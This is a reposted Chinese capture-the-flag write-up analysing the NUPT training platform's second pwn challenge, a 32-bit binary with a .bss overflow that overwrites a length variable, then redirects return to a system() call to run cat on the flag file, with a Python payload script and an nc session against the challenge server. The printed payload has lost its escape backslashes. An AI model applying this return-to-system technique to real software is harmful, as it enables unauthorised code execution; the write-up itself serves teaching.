南邮linux编程实验报告,简单分析南邮实训平台pwn方向真题

本文主要是介绍南邮linux编程实验报告,简单分析南邮实训平台pwn方向真题,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

原标题:简单分析南邮实训平台pwn方向真题

简单分析南邮实训平台pwn方向第二题 - Stack Overflow

环境配置

系统 : Windows xp / ubuntu 32bit

程序 : cgpwna

要求 : 缓冲区溢出执行cat命令

使用工具 :IDA

开始分析

搜集线索

在linux系统中,使用file命令查看文件的信息:

➜ playground filecgpwna

cgpwn a:ELF 32-bit LSB executable, Intel 80386, version1(SYSV), dynamically linked, interpreter /lib/ld-linux. so. 2, forGNU/Linux 2.6. 24, BuildID[sha1]= 8648818dcc39023c4dac61d2edb091bcd3fd3270, not stripped

发现是32位的可执行程序,我们可以先运行一下,了解其输出:

➜ playground ./cgpwna

what doyou want todo?

1.leave somemessage.

2.nothing.

your choice:

1

you can leave somemessage here:

123

your nameplease:

12333

Thank you

what doyou want todo?

1.leave somemessage.

2.nothing.

your choice:

1

you can leave somemessage here:

1

your nameplease:

12

Thank you

what doyou want todo?

1.leave somemessage.

2.nothing.

your choice:

2

bye

直接用ida载入该程序,按下Shift+F12查看字符串列表:

.rodata:08048700 0000000C C echohello!

.rodata:0804870C 00000018 C what doyou want to do?

.rodata:08048724 00000016 C 1.leave some message.

.rodata:0804873A 0000000B C 2.nothing.

.rodata:08048745 0000000D C your choice:

.rodata:08048754 00000021 C you can leave some message here:

.rodata:08048775 00000012 C your name please:

.rodata:08048787 0000000A C Thank you

.eh_frame:08048813 00000005 C ;*2$ "

双击字符串bye查看具体信息,这里通过交叉参考功能定位到main函数,按下F5查看其伪c代码:

int__ cdecl main(intargc, constchar**argv, constchar**envp)

{

setbuf( stdin, 0);

setbuf( stdout, 0);

setbuf( stderr, 0);

while( 1)

{

menu();

fgets(&choice, 100, stdin);

if( choice != 49)

break;

message();

}

puts( "bye");

return0;

}

其中的两个函数内容如下:

intmenu()

{

puts( "what do you want to do?");

puts( "1.leave some message.");

puts( "2.nothing.");

returnputs( "your choice:");

}

intmessage()

{

chars; // [sp+18h] [bp-30h]@1

n = 10;

puts( "you can leave some message here:");

fgets(A, 60, stdin);

puts( "your name please:");

fgets(&s, n, stdin);

returnputs( "Thank you");

}

查找溢出点

这里,接收用户输入的函数的fgets函数:

函数原型

char*fgets(char*buf, intbufsize, FILE *stream);

参数

*buf: 字符型指针,指向用来存储所得数据的地址。

bufsize: 整型数据,指明存储数据的大小。

*stream: 文件结构体指针,将要读取的文件流。

该函数指定了buf的大小,看上去没有什么问题,我们再检查下缓冲区:

fe401915592d3306b18c92adbd1dfc85.png

这里,缓冲区只有40字节的大小,却指定可以接受60个字节大小的数据呢。我们双击'A'查看详细信息:

.bss:0804A080; charA[40]

.bss:0804A080Adb28 hdup(?) ; DATAXREF: message+2 Do

.bss:0804A0A8; intn

.bss:0804A0A8ndd? ; DATAXREF: message+6 w

.bss:0804A0A8; message+4 Br

我们可以给予缓冲区A超过40字节的数据来替换掉n的值,这样就能溢出缓冲区s的值了:

fgets(&s, n, stdin);

双击n查看函数栈视图:

-00000030s db ?

-0000002F db ? ; undefined

-0000002E db ? ; undefined

-0000002D db ? ; undefined

-0000002C db ? ; undefined

-0000002B db ? ; undefined

-0000002A db ? ; undefined

-00000029db ? ; undefined

-00000028db ? ; undefined

-00000027db ? ; undefined

-00000026db ? ; undefined

-00000025db ? ; undefined

-00000024db ? ; undefined

-00000023db ? ; undefined

-00000022db ? ; undefined

-00000021db ? ; undefined

-00000020db ? ; undefined

-0000001F db ? ; undefined

-0000001E db ? ; undefined

-0000001D db ? ; undefined

-0000001C db ? ; undefined

-0000001B db ? ; undefined

-0000001A db ? ; undefined

-00000019db ? ; undefined

-00000018db ? ; undefined

-00000017db ? ; undefined

-00000016db ? ; undefined

-00000015db ? ; undefined

-00000014db ? ; undefined

-00000013db ? ; undefined

-00000012db ? ; undefined

-00000011db ? ; undefined

-00000010db ? ; undefined

-0000000F db ? ; undefined

-0000000E db ? ; undefined

-0000000D db ? ; undefined

-0000000C db ? ; undefined

-0000000B db ? ; undefined

-0000000A db ? ; undefined

-00000009db ? ; undefined

-00000008db ? ; undefined

-00000007db ? ; undefined

-00000006db ? ; undefined

-00000005db ? ; undefined

-00000004db ? ; undefined

-00000003db ? ; undefined

-00000002db ? ; undefined

-00000001db ? ; undefined

+ 00000000s db 4dup(?)

+ 00000004r db 4dup(?)

+ 00000008

+ 00000008; end ofstack variables

此处我们知道,要溢出覆盖n的值,需要40+4个字节的数据填充;而要溢出覆盖函数返回地址,则需要30h+8h=38h(56)个字节的数据。

寻找现有函数

在ida的函数列表视图中,很轻松的找到了pwnme函数:

intpwnme()

{

returnsystem( "echo hello!");

}

我们需要修改函数的参数,然后调用system函数执行cat命令查看flag文件。

推理

再来仔细看看函数的汇编代码:

.text:0804851Dpublicpwnme

.text:0804851Dpwnmeprocnear

.text:0804851Dpushebp

.text:0804851Emovebp, esp

.text:08048520subesp, 18 h

.text:08048523movdwordptr[esp], offsetcommand; " echohello!"

.text:0804852Acall_ system

.text:0804852Fleave

.text:08048530retn

.text:08048530pwnmeendp

函数将command字符串的地址放入esp寄存器指向的栈空间,然后调用了system函数。

我们要做的事,就是将要执行的命令放入缓冲区A中(地址固定),然后将缓冲区A的地址,放入esp寄存器指向的栈空间中,最后直接跳转到地址0804852A调用system函数。

也就是说,我们想要利用漏洞执行cat命令,有两个条件:

能控制程序流程,让其跳转至地址0804852A。

确保esp指向的栈空间,保存的是输入的命令(缓冲区A)的地址。

我们知道,执行ret时会弹栈,esp会指向函数返回地址的下一格栈单元:

f0328d387e60d262adb2dea50c2804ac.png

所以不妨填充函数返回地址下方的栈单元为offest A,当ret 指令跳转执行call system命令时,esp也指向了缓冲区A的地址。

编写shellcode

按照以上推理,用python编写shellcode如下:

cmd = 'cat /home/pwn/flagx001111111111111111111111111n'

f= open( 'my_shellcode', 'w')

f. write( '1n')

f. write(cmd)

f. write( '1111111111111111111111111111111111111111111111111111x2Ax85x04x08x80xA0x04x08n')

f. close()

夺旗成功

连接服务器,用生成的文件作为输入:

➜ playground nc 182.254. 217.14210001< my_shellcode

what doyou want todo?

1.leave some message.

2.nothing.

your choice:

you can leave some message here:

your name please:

Thank you

flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}

参考链接

1、栈溢出漏洞的利用和缓解

https://evilpan.com/2018/03/17/exploit-the-stack/#top

2、fgets函数

https://baike.baidu.com/item/fgets/10942211?fr=aladdin

- End -

c6b19d28640e9160532479fbd6287f56.png

看雪ID:顾言庭

https://bbs.pediy.com/user-800468.htm

本文由看雪论坛 顾言庭原创

转载请注明来自看雪社区

热门图书推荐:

戳立即购买!

(晋级赛Q1正在火热进行中~!比赛时间:3.10-3.24)返回搜狐,查看更多

责任编辑:

这篇关于南邮linux编程实验报告,简单分析南邮实训平台pwn方向真题的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/351919

相关文章

linux hostname设置全过程

《linuxhostname设置全过程》:本文主要介绍linuxhostname设置全过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录查询hostname设置步骤其它相关点hostid/etc/hostsEDChina编程A工具license破解注意事项总结以RHE

怎样通过分析GC日志来定位Java进程的内存问题

《怎样通过分析GC日志来定位Java进程的内存问题》:本文主要介绍怎样通过分析GC日志来定位Java进程的内存问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、GC 日志基础配置1. 启用详细 GC 日志2. 不同收集器的日志格式二、关键指标与分析维度1.

Linux中压缩、网络传输与系统监控工具的使用完整指南

《Linux中压缩、网络传输与系统监控工具的使用完整指南》在Linux系统管理中,压缩与传输工具是数据备份和远程协作的桥梁,而系统监控工具则是保障服务器稳定运行的眼睛,下面小编就来和大家详细介绍一下它... 目录引言一、压缩与解压:数据存储与传输的优化核心1. zip/unzip:通用压缩格式的便捷操作2.

Linux中SSH服务配置的全面指南

《Linux中SSH服务配置的全面指南》作为网络安全工程师,SSH(SecureShell)服务的安全配置是我们日常工作中不可忽视的重要环节,本文将从基础配置到高级安全加固,全面解析SSH服务的各项参... 目录概述基础配置详解端口与监听设置主机密钥配置认证机制强化禁用密码认证禁止root直接登录实现双因素

Go语言数据库编程GORM 的基本使用详解

《Go语言数据库编程GORM的基本使用详解》GORM是Go语言流行的ORM框架,封装database/sql,支持自动迁移、关联、事务等,提供CRUD、条件查询、钩子函数、日志等功能,简化数据库操作... 目录一、安装与初始化1. 安装 GORM 及数据库驱动2. 建立数据库连接二、定义模型结构体三、自动迁

MySQL中的表连接原理分析

《MySQL中的表连接原理分析》:本文主要介绍MySQL中的表连接原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、环境3、表连接原理【1】驱动表和被驱动表【2】内连接【3】外连接【4编程】嵌套循环连接【5】join buffer4、总结1、背景

在Linux终端中统计非二进制文件行数的实现方法

《在Linux终端中统计非二进制文件行数的实现方法》在Linux系统中,有时需要统计非二进制文件(如CSV、TXT文件)的行数,而不希望手动打开文件进行查看,例如,在处理大型日志文件、数据文件时,了解... 目录在linux终端中统计非二进制文件的行数技术背景实现步骤1. 使用wc命令2. 使用grep命令

python中Hash使用场景分析

《python中Hash使用场景分析》Python的hash()函数用于获取对象哈希值,常用于字典和集合,不可变类型可哈希,可变类型不可,常见算法包括除法、乘法、平方取中和随机数哈希,各有优缺点,需根... 目录python中的 Hash除法哈希算法乘法哈希算法平方取中法随机数哈希算法小结在Python中,

Java Stream的distinct去重原理分析

《JavaStream的distinct去重原理分析》Javastream中的distinct方法用于去除流中的重复元素,它返回一个包含过滤后唯一元素的新流,该方法会根据元素的hashcode和eq... 目录一、distinct 的基础用法与核心特性二、distinct 的底层实现原理1. 顺序流中的去重

Linux如何快速检查服务器的硬件配置和性能指标

《Linux如何快速检查服务器的硬件配置和性能指标》在运维和开发工作中,我们经常需要快速检查Linux服务器的硬件配置和性能指标,本文将以CentOS为例,介绍如何通过命令行快速获取这些关键信息,... 目录引言一、查询CPU核心数编程(几C?)1. 使用 nproc(最简单)2. 使用 lscpu(详细信